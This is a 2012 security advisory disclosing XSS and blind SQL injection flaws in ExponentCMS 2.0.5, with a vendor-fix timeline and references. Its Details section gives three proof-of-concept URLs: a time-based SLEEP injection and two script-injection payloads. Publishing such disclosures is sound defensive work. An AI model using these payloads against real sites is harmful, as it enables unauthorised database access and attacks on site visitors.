XSS and Blind SQL Injection Vulnerabilities in ExponentCMS



EKU-ID: 2010 CVE: OSVDB-ID:
Author: Onur Yılmaz Published: 2012-04-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Information
--------------------
Name :  XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
Software :  ExponentCMS 2.0.5 and possibly below.
Vendor Homepage :  http://www.exponentcms.org
Vulnerability Type :  Cross-Site Scripting and SQL Injection
Severity :  Critical
Researcher :  Onur Yılmaz
Advisory Reference :  NS-12-006

Description
--------------------
Exponent is a website content management system (or CMS) that allows
site owners to easily create and manage dynamic websites without
necessarily directly coding web pages, or managing site navigation.

Details
--------------------
Exponent CMS is affected by XSS and SQL Injection vulnerabilities in
version 2.0.5.

Example PoC urls are as follows :
http://example.com/index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)
http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src=@random4e5433b85bb1f
http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

You can read the full article about Cross-Site Scripting and SQL
Injection vulnerabilities from here :
http://www.mavitunasecurity.com/crosssite-scripting-xss/
http://www.mavitunasecurity.com/sql-injection/

Solution
--------------------
The vendor fixed this vulnerability in the new version. Please see the
references.

Advisory Timeline
--------------------
12/03/2012 - First contact: Sent the vulnerability details
20/03/2012 - Vulnerability Fixed in latest version
25/04/2012 - Vulnerability Released

Credits
--------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.

References
--------------------
Vendor Url / Patch :
http://exponentcms.org/news/-happy-hyperbole-v2-0-6-is-in-full-bloom
MSL Advisory Link :
http://www.mavitunasecurity.com/blog/xss-and-blind-sql-injection-vulnerabilities-in-exponentcms/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/